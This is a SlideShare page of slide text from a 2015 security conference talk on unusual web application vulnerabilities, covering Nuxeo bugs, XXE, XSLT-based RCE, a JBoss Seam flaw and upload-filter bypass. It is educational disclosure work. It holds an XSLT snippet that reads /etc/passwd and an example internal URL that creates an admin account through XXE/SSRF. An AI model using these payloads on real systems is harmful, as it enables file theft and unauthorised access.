SlideShare a Scribd company logo

CONFidence 2015: Nietypowe problemy bezpieczeństwa w aplikacjach webowych - Michał Sajdak

PROIDEA
PROIDEA

Speaker: Michał Sajdak Language: English I will show (live demos!) several web vulnerabilities: first public disclosure of critical bugs in Nuxeo platform, RCE in XSLT transformation, non-standard path traversal examples, problems during processing XML files, or unusual problems with file upload. During the presentation you will have a chance to win a bottle of vine (received as a bug bounty for reporting the issues to Nuxeo team). CONFidence: http://confidence.org.pl/pl/

Software
1 of 34
Download to read offline
Unusual security problems in web applications. Michał Sajdak, CISSP, CEH, F2B securitum.pl sekurak.pl rozwal.to
About me Michał Sajdak <at> securitum.pl Pentester Instructor (security trainings) sekurak.pl founder rozwal.to founder 2 Copyright 2014 Securitum www.securitum.pl
Agenda Vulnerabilities in Nuxeo First public disclosure (Maybe?) not so obvious path traversal(s) OS code exec XXE JBoss Seam nice RCE RCE through XSLT transformation (if we have time) PHP shell upload – filter bypassing (if we have time) Educational use only 3 Copyright 2014 Securitum www.securitum.pl
Nuxeo Content Management Platform for the Software-Defined Enterprise 4 Copyright 2015 Securitum www.securitum.pl
Nuxeo The RPM (Release and Preservation Management) Department at EA uses the Nuxeo Platform to manage video game builds at all stages of the development lifecycle Using the Nuxeo Platform as a core server, Jeppesen, a Boeing company, syncs flight bag information to iPads for pilots across the world. 5 Copyright 2015 Securitum www.securitum.pl
Nuxeo The Nuxeo Platform, offering strong support for SSO, along with a flexible content management platform, is the perfect addition to the US Navy’s application portfolio. Orange manages communication with its mobile telecommunications and broadband internet provider clients through a secure extranet portal built on the Nuxeo Platform. 6 Copyright 2015 Securitum www.securitum.pl
Nuxeo History Bug patched this year (February) Reported by Michal Bentkowski & Sebastian Gilon from securitum.pl https://doc.nuxeo.com/display/ADMINDOC/Nuxeo+Security+ Update+-+2015-02-27+-+Critical No details disclosed DEMO 7 Copyright 2015 Securitum www.securitum.pl
Nuxeo – reporting history Securitum: Hey, you got some nasty bugs in your platform. Here are the details. Nuxeo: Cool, these are definitely nice bugs! We’ll prepare a patch soon! BTW: do you want something for reporting the bug? Securitum: no :-) Nuxeo: Do you drink from time to time? Securitum: Sometimes :P Nuxeo: Cool, we are sending 2 crates of vine to Poland 8
Nice bug bounty 9
XXE (XML eXternal Entities) XXE has been known for a while But many many applications are vulnerable by default BTW: XXE tests are available only in the latest versions of burp suite (very popular web pentesting tool) 10 Copyright 2014 Securitum www.securitum.pl
XXE (XML eXternal Entities) HTML entiries &lt; lub &#60; < &quot; &apos; &amp; &micro; … Or: &entity_name; &#entity_number; 11 Copyright 2014 Securitum www.securitum.pl
HTML entities Similar in XML… 12 Copyright 2014 Securitum www.securitum.pl
XXE (XML eXternal Entities) … but we can define our own entities <!ENTITY name "value"> 13 Copyright 2014 Securitum www.securitum.pl
14 Copyright 2014 Securitum www.securitum.pl
15
XXE (XML eXternal Entities) We can only read files? No :p Making http requests Transfering files to your server (blind XXE) Making request to 127.0.0.1 Some of these are unauthenticated ? Scanning backend infrastruture Services with no auth check, etc. http://10.0.0.75:8080/usrMgmt/add/admin2/admin2 16 Copyright 2014 Securitum www.securitum.pl
XXE (XML eXternal Entities) Actually we can often exploit XXE when no tag is displayed (!) ie. only when the XML parser starts. Parameter Entity They can be used only in DOCTYPE <!ENTITY % name "entity_value"> 17 Copyright 2014 Securitum www.securitum.pl
sekurak.pl/data/ccc More info: sekurak.pl/tag/xxe/ 18 Copyright 2014 Securitum www.securitum.pl
XXE (XML eXternal Entities) Can we only read files? No :P Making http requests Transfering files to your server (blind XXE) FW must allow outgoing http communication Making request to 127.0.0.1 Some of there are unauthenticated ? Scanning backend infrastructore Services with no auth check, etc. 19 Copyright 2014 Securitum www.securitum.pl
XXE (XML eXternal Entities) DEMO 20 Copyright 2014 Securitum www.securitum.pl
XSLT XSLT (Extensible Stylesheet Language Transformations) is a language for: transforming XML documents into other XML documents or other formats such as HTML for web pages, plain text © wikipedia 21 Copyright 2014 Securitum www.securitum.pl
XSLT Commonly used for custom styling in web apps XML (db generated) + XSLT (user provided styles) = nice HTML = nice PDF etc. 22 Copyright 2014 Securitum www.securitum.pl
23 Copyright 2014 Securitum www.securitum.pl
XSLT We can have a problem when a user (ie. attacker) can provide XSL file to be parsed at server side Example: custom destkop in web app Example: print templates … 24 Copyright 2014 Securitum www.securitum.pl
XSLT Java… 25 Copyright 2014 Securitum www.securitum.pl
XSLT PHP Doesn’t work by default… But reading files does: <xsl:template match="/"> <xsl:copy-of select="document('/etc/passwd')"/> </xsl:template> 26 Copyright 2014 Securitum www.securitum.pl
OS Command Exec – JBoss Seam But an example of the following problem We deploy an app which uses library X After some time… vulnerabilities in the used lib Info: Meder Kydyraliev, Seam Vulnerability, http://blog.o0o.nu/ 27 Copyright 2014 Securitum www.securitum.pl
OS Command Exec – JBoss Seam There is (are) a vulnerability in JBoss Seam which allows you to exec OS code No auth needed No specific condition needed The only requirement – an app is using the vulnerable version of the lib DEMO 28 Copyright 2014 Securitum www.securitum.pl
Upload / Apache – filter bypassing Commonly used methods: File extension blacklisting ie.: no .php / .jsp / etc. can be uploaded Checking file structure ie.: if the uploaded file is a real image / pdf / etc 29 Copyright 2014 Securitum www.securitum.pl
Upload / Apache – filter bypassing Interesting fact How many of apache servers will interpret the following file: test.jpg.php.wnk2j3.tralalala.sekurak txt ? php ? jpg ? 30 Copyright 2014 Securitum www.securitum.pl
31 Copyright 2014 Securitum www.securitum.pl
What’s next? dotnetnuke – full unauth admin TP-link devices Two new methods for gaining OS root One sort of universal – works in old/new devices Disclosure on sekurak.pl ~soon 32 Copyright 2014 Securitum www.securitum.pl
Q&A ? Questions? Contact: michal.sajdak@securitum.pl http://securitum.pl/ http://sekurak.pl/ http://rozwal.to/ 33 Copyright 2014 Securitum www.securitum.pl
34

Recommended

PHP {in}security
PHP {in}securityPHP {in}security
PHP {in}securityMichael Clark
 
Web Security Programming I I
Web Security Programming I IWeb Security Programming I I
Web Security Programming I IPavu Jas
 
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...mfrancis
 
Anatomy of Exploit Kits
Anatomy of Exploit KitsAnatomy of Exploit Kits
Anatomy of Exploit Kitssecurityxploded
 
Ethernet Shield
Ethernet ShieldEthernet Shield
Ethernet ShieldTinker
 
Reversing & malware analysis training part 2 introduction to windows internals
Reversing & malware analysis training part 2 introduction to windows internalsReversing & malware analysis training part 2 introduction to windows internals
Reversing & malware analysis training part 2 introduction to windows internalssecurityxploded
 
Arduino práctico ethernet
Arduino práctico ethernetArduino práctico ethernet
Arduino práctico ethernetJose Antonio Vacas
 
4Developers 2015: Jak silnik UE4 zmienił podejście do tworzenia gier - Tomasz...
4Developers 2015: Jak silnik UE4 zmienił podejście do tworzenia gier - Tomasz...4Developers 2015: Jak silnik UE4 zmienił podejście do tworzenia gier - Tomasz...
4Developers 2015: Jak silnik UE4 zmienił podejście do tworzenia gier - Tomasz...PROIDEA
 

Recommended

PHP {in}security
PHP {in}securityPHP {in}security
PHP {in}securityMichael Clark
 
Web Security Programming I I
Web Security Programming I IWeb Security Programming I I
Web Security Programming I IPavu Jas
 
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...mfrancis
 
Anatomy of Exploit Kits
Anatomy of Exploit KitsAnatomy of Exploit Kits
Anatomy of Exploit Kitssecurityxploded
 
Ethernet Shield
Ethernet ShieldEthernet Shield
Ethernet ShieldTinker
 
Reversing & malware analysis training part 2 introduction to windows internals
Reversing & malware analysis training part 2 introduction to windows internalsReversing & malware analysis training part 2 introduction to windows internals
Reversing & malware analysis training part 2 introduction to windows internalssecurityxploded
 
Arduino práctico ethernet
Arduino práctico ethernetArduino práctico ethernet
Arduino práctico ethernetJose Antonio Vacas
 
4Developers 2015: Jak silnik UE4 zmienił podejście do tworzenia gier - Tomasz...
4Developers 2015: Jak silnik UE4 zmienił podejście do tworzenia gier - Tomasz...4Developers 2015: Jak silnik UE4 zmienił podejście do tworzenia gier - Tomasz...
4Developers 2015: Jak silnik UE4 zmienił podejście do tworzenia gier - Tomasz...PROIDEA
 
4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa
4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa
4Developers 2015: People don't give a f**k of JavaScript - Aurelio De RosaPROIDEA
 
4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski
4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski
4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub GutkowskiPROIDEA
 
Atmosphere Conference 2015: DevOps and the Need for Speed
Atmosphere Conference 2015: DevOps and the Need for SpeedAtmosphere Conference 2015: DevOps and the Need for Speed
Atmosphere Conference 2015: DevOps and the Need for SpeedPROIDEA
 
PLNOG15: Software Define Storage: mass storage solutions built on network inf...
PLNOG15: Software Define Storage: mass storage solutions built on network inf...PLNOG15: Software Define Storage: mass storage solutions built on network inf...
PLNOG15: Software Define Storage: mass storage solutions built on network inf...PROIDEA
 
CLOUDS
CLOUDSCLOUDS
CLOUDSVAST ONLINE TRAFFIC™
 
PLNOG15: Yang - latin of XXI centaury - Sławomir Janukowicz
PLNOG15: Yang - latin of XXI centaury - Sławomir JanukowiczPLNOG15: Yang - latin of XXI centaury - Sławomir Janukowicz
PLNOG15: Yang - latin of XXI centaury - Sławomir JanukowiczPROIDEA
 
CONFidence 2015: Fuzz your way into the web server's zoo - Andrey Plastunov
CONFidence 2015: Fuzz your way into the web server's zoo - Andrey PlastunovCONFidence 2015: Fuzz your way into the web server's zoo - Andrey Plastunov
CONFidence 2015: Fuzz your way into the web server's zoo - Andrey PlastunovPROIDEA
 
PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...
PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...
PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...PROIDEA
 
4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...
4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...
4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...PROIDEA
 
Work commute Top 10 Mobile apps
Work commute Top 10 Mobile appsWork commute Top 10 Mobile apps
Work commute Top 10 Mobile appsDedicatedfolloweroffashion
 
Strategic management in hr
Strategic management in hrStrategic management in hr
Strategic management in hrGc university faisalabad
 
CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...
CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...
CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...PROIDEA
 
4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...
4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...
4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...PROIDEA
 
JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak
JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak
JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak PROIDEA
 
PLNOG15: Data Center migration in practice - Tomasz Jarlaczyk
PLNOG15: Data Center migration in practice - Tomasz JarlaczykPLNOG15: Data Center migration in practice - Tomasz Jarlaczyk
PLNOG15: Data Center migration in practice - Tomasz JarlaczykPROIDEA
 
Srm
SrmSrm
SrmNikuraTw
 
seven c,s
seven c,sseven c,s
seven c,sGc university faisalabad
 
4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki
4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki
4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian GrodzickiPROIDEA
 
PLNOG 13: Krzysztof Mazepa: BGP FlowSpec
PLNOG 13: Krzysztof Mazepa: BGP FlowSpecPLNOG 13: Krzysztof Mazepa: BGP FlowSpec
PLNOG 13: Krzysztof Mazepa: BGP FlowSpecPROIDEA
 
Social protection for older persons in rural areas
Social protection for older persons in rural areasSocial protection for older persons in rural areas
Social protection for older persons in rural areasSIANI
 
Handout2o
Handout2oHandout2o
Handout2oShahbaz Sidhu
 
Hack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingHack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingTom Keetch
 

More Related Content

Viewers also liked

4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa
4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa
4Developers 2015: People don't give a f**k of JavaScript - Aurelio De RosaPROIDEA
 
4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski
4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski
4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub GutkowskiPROIDEA
 
Atmosphere Conference 2015: DevOps and the Need for Speed
Atmosphere Conference 2015: DevOps and the Need for SpeedAtmosphere Conference 2015: DevOps and the Need for Speed
Atmosphere Conference 2015: DevOps and the Need for SpeedPROIDEA
 
PLNOG15: Software Define Storage: mass storage solutions built on network inf...
PLNOG15: Software Define Storage: mass storage solutions built on network inf...PLNOG15: Software Define Storage: mass storage solutions built on network inf...
PLNOG15: Software Define Storage: mass storage solutions built on network inf...PROIDEA
 
PLNOG15: Yang - latin of XXI centaury - Sławomir Janukowicz
PLNOG15: Yang - latin of XXI centaury - Sławomir JanukowiczPLNOG15: Yang - latin of XXI centaury - Sławomir Janukowicz
PLNOG15: Yang - latin of XXI centaury - Sławomir JanukowiczPROIDEA
 
CONFidence 2015: Fuzz your way into the web server's zoo - Andrey Plastunov
CONFidence 2015: Fuzz your way into the web server's zoo - Andrey PlastunovCONFidence 2015: Fuzz your way into the web server's zoo - Andrey Plastunov
CONFidence 2015: Fuzz your way into the web server's zoo - Andrey PlastunovPROIDEA
 
PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...
PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...
PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...PROIDEA
 
4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...
4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...
4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...PROIDEA
 
CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...
CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...
CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...PROIDEA
 
4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...
4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...
4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...PROIDEA
 
JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak
JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak
JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak PROIDEA
 
PLNOG15: Data Center migration in practice - Tomasz Jarlaczyk
PLNOG15: Data Center migration in practice - Tomasz JarlaczykPLNOG15: Data Center migration in practice - Tomasz Jarlaczyk
PLNOG15: Data Center migration in practice - Tomasz JarlaczykPROIDEA
 
4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki
4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki
4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian GrodzickiPROIDEA
 
PLNOG 13: Krzysztof Mazepa: BGP FlowSpec
PLNOG 13: Krzysztof Mazepa: BGP FlowSpecPLNOG 13: Krzysztof Mazepa: BGP FlowSpec
PLNOG 13: Krzysztof Mazepa: BGP FlowSpecPROIDEA
 
Social protection for older persons in rural areas
Social protection for older persons in rural areasSocial protection for older persons in rural areas
Social protection for older persons in rural areasSIANI
 

Viewers also liked (20)

4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa
4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa
4Developers 2015: People don't give a f**k of JavaScript - Aurelio De Rosa
 
4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski
4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski
4Developers 2015: mac.NET czyli ASP.NET vNext na przykładzie - Jakub Gutkowski
 
Atmosphere Conference 2015: DevOps and the Need for Speed
Atmosphere Conference 2015: DevOps and the Need for SpeedAtmosphere Conference 2015: DevOps and the Need for Speed
Atmosphere Conference 2015: DevOps and the Need for Speed
 
PLNOG15: Software Define Storage: mass storage solutions built on network inf...
PLNOG15: Software Define Storage: mass storage solutions built on network inf...PLNOG15: Software Define Storage: mass storage solutions built on network inf...
PLNOG15: Software Define Storage: mass storage solutions built on network inf...
 
CLOUDS
CLOUDSCLOUDS
CLOUDS
 
PLNOG15: Yang - latin of XXI centaury - Sławomir Janukowicz
PLNOG15: Yang - latin of XXI centaury - Sławomir JanukowiczPLNOG15: Yang - latin of XXI centaury - Sławomir Janukowicz
PLNOG15: Yang - latin of XXI centaury - Sławomir Janukowicz
 
CONFidence 2015: Fuzz your way into the web server's zoo - Andrey Plastunov
CONFidence 2015: Fuzz your way into the web server's zoo - Andrey PlastunovCONFidence 2015: Fuzz your way into the web server's zoo - Andrey Plastunov
CONFidence 2015: Fuzz your way into the web server's zoo - Andrey Plastunov
 
PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...
PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...
PLNOG15: IP services architecture with TDM quality in MPLS/IP networks - Mare...
 
4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...
4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...
4Developers 2015: CQRS - Prosta architektura dla nieprostego systemu! - Mateu...
 
Work commute Top 10 Mobile apps
Work commute Top 10 Mobile appsWork commute Top 10 Mobile apps
Work commute Top 10 Mobile apps
 
Strategic management in hr
Strategic management in hrStrategic management in hr
Strategic management in hr
 
CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...
CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...
CONFidence 2015: APT x 3 - trzy firmy, trzy wektory ataków, trzy do zera - wy...
 
4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...
4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...
4Developers 2015: Couple of words about testing in Java, Spock and BDD - Piot...
 
JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak
JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak
JDD 2015: Artificial intelligence. Status report. - Tomasz Jackowiak
 
PLNOG15: Data Center migration in practice - Tomasz Jarlaczyk
PLNOG15: Data Center migration in practice - Tomasz JarlaczykPLNOG15: Data Center migration in practice - Tomasz Jarlaczyk
PLNOG15: Data Center migration in practice - Tomasz Jarlaczyk
 
Srm
SrmSrm
Srm
 
seven c,s
seven c,sseven c,s
seven c,s
 
4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki
4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki
4Developers 2015: Scaling LAMP doesn't have to suck - Sebastian Grodzicki
 
PLNOG 13: Krzysztof Mazepa: BGP FlowSpec
PLNOG 13: Krzysztof Mazepa: BGP FlowSpecPLNOG 13: Krzysztof Mazepa: BGP FlowSpec
PLNOG 13: Krzysztof Mazepa: BGP FlowSpec
 
Social protection for older persons in rural areas
Social protection for older persons in rural areasSocial protection for older persons in rural areas
Social protection for older persons in rural areas
 

Similar to CONFidence 2015: Nietypowe problemy bezpieczeństwa w aplikacjach webowych - Michał Sajdak

Hack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingHack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingTom Keetch
 
Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Jérôme Petazzoni
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityJérôme Petazzoni
 
The Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron GrattafioriThe Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron GrattafioriDocker, Inc.
 
iOS (Vulner)ability
iOS (Vulner)abilityiOS (Vulner)ability
iOS (Vulner)abilitySubho Halder
 
Introduction to Umbraco
Introduction to UmbracoIntroduction to Umbraco
Introduction to UmbracoRoel
 
Running Accurate, Scalable, and Reproducible Simulations of Distributed Syste...
Running Accurate, Scalable, and Reproducible Simulations of Distributed Syste...Running Accurate, Scalable, and Reproducible Simulations of Distributed Syste...
Running Accurate, Scalable, and Reproducible Simulations of Distributed Syste...Rafael Ferreira da Silva
 
Industrializing the creation of machine images and Docker containers for clou...
Industrializing the creation of machine images and Docker containers for clou...Industrializing the creation of machine images and Docker containers for clou...
Industrializing the creation of machine images and Docker containers for clou...OW2
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)CODE WHITE GmbH
 
CoreOS and cloud provider integration: simple cloud-init example at Exoscale
CoreOS and cloud provider integration: simple cloud-init example at ExoscaleCoreOS and cloud provider integration: simple cloud-init example at Exoscale
CoreOS and cloud provider integration: simple cloud-init example at ExoscaleAntoine COETSIER
 
CEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxCEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxYasserOuda2
 
Microservices and containers for the unitiated
Microservices and containers for the unitiatedMicroservices and containers for the unitiated
Microservices and containers for the unitiatedKevin Lee
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
 

Similar to CONFidence 2015: Nietypowe problemy bezpieczeństwa w aplikacjach webowych - Michał Sajdak (20)

Handout2o
Handout2oHandout2o
Handout2o
 
Hack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical SandboxingHack In Paris 2011 - Practical Sandboxing
Hack In Paris 2011 - Practical Sandboxing
 
Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?Docker, Linux Containers, and Security: Does It Add Up?
Docker, Linux Containers, and Security: Does It Add Up?
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Docker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and securityDocker, Linux Containers (LXC), and security
Docker, Linux Containers (LXC), and security
 
Node js introduction
Node js introductionNode js introduction
Node js introduction
 
The Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron GrattafioriThe Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
The Golden Ticket: Docker and High Security Microservices by Aaron Grattafiori
 
iOS (Vulner)ability
iOS (Vulner)abilityiOS (Vulner)ability
iOS (Vulner)ability
 
Introduction to Umbraco
Introduction to UmbracoIntroduction to Umbraco
Introduction to Umbraco
 
Running Accurate, Scalable, and Reproducible Simulations of Distributed Syste...
Running Accurate, Scalable, and Reproducible Simulations of Distributed Syste...Running Accurate, Scalable, and Reproducible Simulations of Distributed Syste...
Running Accurate, Scalable, and Reproducible Simulations of Distributed Syste...
 
Industrializing the creation of machine images and Docker containers for clou...
Industrializing the creation of machine images and Docker containers for clou...Industrializing the creation of machine images and Docker containers for clou...
Industrializing the creation of machine images and Docker containers for clou...
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
 
Docker practical solutions
Docker practical solutionsDocker practical solutions
Docker practical solutions
 
CoreOS and cloud provider integration: simple cloud-init example at Exoscale
CoreOS and cloud provider integration: simple cloud-init example at ExoscaleCoreOS and cloud provider integration: simple cloud-init example at Exoscale
CoreOS and cloud provider integration: simple cloud-init example at Exoscale
 
CEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxCEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptx
 
Sjug aug 2010_cloud
Sjug aug 2010_cloudSjug aug 2010_cloud
Sjug aug 2010_cloud
 
Microservices and containers for the unitiated
Microservices and containers for the unitiatedMicroservices and containers for the unitiated
Microservices and containers for the unitiated
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
 
News bytes Oct-2011
News bytes Oct-2011News bytes Oct-2011
News bytes Oct-2011
 

Recently uploaded

BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationkaushalgiri8080
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
